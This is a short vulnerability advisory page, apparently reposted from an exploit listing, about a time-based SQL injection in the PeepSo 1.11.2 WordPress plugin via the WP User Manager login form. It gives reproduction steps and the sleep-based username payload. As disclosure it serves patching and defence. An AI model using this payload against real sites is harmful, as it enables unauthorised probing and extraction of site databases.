WordPress PeepSo 1.11.2 SQL Injection

2018.11.12
Credit: Socket_0x03
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

============================================================ PeepSo v1.11.2 (WordPress Plugin) - Time-Based SQL Injection ============================================================ ____________________________________________________________________________________ # Exploit Title: PeepSo v1.11.2 (WordPress Plugin) - Time-Based SQL Injection # Date: [11-09-2018] # Category: Webapps ____________________________________________________________________________________ # Author: Socket_0x03 (Alvaro J. Gene) # Email: Socket_0x03 (at) teraexe (dot) com # Website: www.teraexe.com ____________________________________________________________________________________ # Software Link: https://wordpress.org/plugins/peepso-core/ # Plugin: PeepSo # Version: 1.11.2 # Language: This application is available in English language. # Plugin Description: A social network plugin for WordPress with different kinds of features, such as user profiles, user login, user registration, and more features. ____________________________________________________________________________________ # Time-Based SQL Injection: First, install WP User Manager v2.0.8. Second, install PeepSo v1.11.2 Third, go to the login panel of WP User Manager: http://www.website.com/wordpress/index.php/login Fourth, type the SQL injection: Username: iawcfqto'=sleep(10)=' Password: password Finally, click on Login


See this note in RAW Version
Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top